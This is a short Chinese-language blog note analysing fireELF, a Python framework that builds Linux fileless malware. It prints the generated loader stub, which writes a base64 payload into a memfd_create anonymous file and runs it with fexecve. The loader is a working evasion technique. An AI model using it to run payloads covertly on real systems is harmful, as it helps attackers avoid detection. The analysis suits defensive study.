2019-M02 - Fileless Malware Framework
看文章的时候看到了一个 [project][0] 介绍 fileless 的恶意程式：他是用 python 写的 linux-based
的无档案恶意程式套件 可以让使用者简单快速的产生、建立一个 fileless 恶意程式
不得不说，这个 project 的 source code 可读性非常差 (虽然用 Python 撰写的)
在 main.py 开始有两个部分：CLI 参数的处理、以及产生恶意程式的部分
在透过一连串的操作之后最后会产生一个 Python 恶意档案：
#! /usr/bin/env python
import ctypes, os, urllib2, base64
libc = ctypes.CDLL(None)
argv = ctypes.pointer((ctypes.c_char_p * 0)(*[]))
syscall = libc.syscall
fexecve = libc.fexecve
content = base64.b64decode("...")
fd = syscall(319, "", 1)
os.write(fd, content)
fexecve(fd, argv, argv)
从产生的程式码来看他的目的是透过：ctypes 来找到 [fexecve][1] 跟 [sys_memfd_create][2]
这两个 syscall 来完成无档案的恶意程式
先透过 **memfd_create** 来产生一个暱名档案 (anonymous file)、写入恶意内容、最后透过 **fexecve** 执行。
[0]: https://github.com/rek7/fireELF/
[1]: https://linux.die.net/man/3/fexecve
[2]: https://www.systutorials.com/docs/linux/man/2-memfd_create/